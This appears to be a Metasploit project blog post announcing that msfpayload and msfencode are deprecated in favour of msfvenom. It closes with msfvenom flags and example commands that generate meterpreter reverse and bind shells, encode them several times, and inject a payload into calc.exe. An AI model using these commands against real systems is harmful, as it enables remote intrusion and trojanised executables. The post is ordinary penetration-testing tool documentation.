Good-bye msfpayload and msfencode

Last updated at Wed, 12 Feb 2020 18:38:24 GMT

Greetings all,

On behalf of the Metasploit's development teams, I'd like to officially announce the decision of deprecating msfpayload and msfencode. Also starting today, we no longer support or accept patches for these two utilities. On June 8th 2015, the elderly msfpayload and msfencode will retire from the Metasploit repository, and replaced by their successor msfvenom. The tool msfvenom is the combination of msfpayload and msfencode, and has been in testing for more than 3.5 years.

msfpayload and msfencode have been in service to the hacking community for almost 10 years. What's really remarkable about them is that and they've been playing a big part in the success of computer hacking on almost every level, offense or defense. As an experienced penetration tester, sometimes maybe you don't necessarily know all the exploits out there publicly, maybe you don't even care because you're such a honey badger, but I'm pretty sure you would be more than happy to bring a modified executable generated by msfpayload for an on-site gig just in case. If you're just feeling nerdy all the way, you probably "concealed-carry" a msfpayload-generated file on your USB keychain at all times, too. If you're an exploit writer, for fun or profit, even if you don't really write Metasploit modules, you probably have used msfpayload to create something for you. If you're just a security enthusiast, maybe you've even used msfpayload to impress your friends. Both msfpayload and msfencode have also had their share in the education and entertainment industry, including: books, on-line tutorials, talks at security conferences, trainings, live interviews, Youtube, etc. I can spend my entire blog talking about how people use these tools if you let me. But if you have a cool hacking story done with mostly just msfpayload, please do share in the comment section below.

The second remarkable thing about msfpayload and msfencode is the people behind them. Since 2005, the tools have been fixed, improved, maintained, and documented by the open source security community. Each person has sacrificed their weekends, holidays, quality time with their friends and family to make sure the tools remain working properly. It has not been always easy, and most importantly no contributors have ever asked anything in return. If you ever run into one of these Metasploit people at a conference, make sure to buy them a drink.

As we begin the final six-month journey, we'd like to encourage you to use the time to become familiar with msfvenom. If you are a tool developer that relies on msfpayload or msfencode, now is a good time to start making that migration. If you're a trainer, please update your course materials.

Basic Msfvenom Usage

If you have never used msfvenom, the first thing you should do is read the help menu, and memorize some of these flags:

    -p, --payload    <payload>       Payload to use. Specify a '-' or stdin to use custom payloads  
    -l, --list       [module_type]   List a module type example: payloads, encoders, nops, all  
    -n, --nopsled    <length>        Prepend a nopsled of [length] size on to the payload  
    -f, --format     <format>        Output format (use --help-formats for a list)  
    -e, --encoder    [encoder]       The encoder to use  
    -a, --arch       <architecture>  The architecture to use  
        --platform   <platform>      The platform of the payload  
    -s, --space      <length>        The maximum size of the resulting payload  
    -b, --bad-chars  <list>          The list of characters to avoid example: '\x00\xff'  
    -i, --iterations <count>         The number of times to encode the payload  
    -c, --add-code   <path>          Specify an additional win32 shellcode file to include  
    -x, --template   <path>          Specify a custom executable file to use as a template  
    -k, --keep                       Preserve the template behavior and inject the payload as a new thread  
        --payload-options            List the payload's standard options  
    -o, --out   <path>               Save the payload  
    -v, --var-name <name>            Specify a custom variable name to use for certain output formats  
    -h, --help                       Show this message  
        --help-formats               List available formats  

Example 1: If you wish to list all the payloads available, you can do the following (also the same for listing encoders, nops, or all):

./msfvenom -l payloads  

Example 2: Generating a windows/meterpreter/reverse_tcp:

./msfvenom -p windows/meterpreter/reverse_tcp LHOST=IP -f exe  

Example 3: To generate a payload that avoids certain bad characters:

./msfvenom -p windows/meterpreter/bind_tcp -b '\x00'  

Example 4: To generate a payload with a specific encoder, and then encode 3 times:

./msfvenom -p windows/meterpreter/bind_tcp -e x86/shikata_ga_nai -i 3  

Example 5: Inject a payload to calc.exe, and save it as new.exe

./msfvenom -p windows/meterpreter/bind_tcp -x calc.exe -k -f exe > new.exe  

Msfvenom is also documented [here]

And that's it for today. If you find any issues with msfvenom, please report to: https://github.com/rapid7/metasploit-framework/issues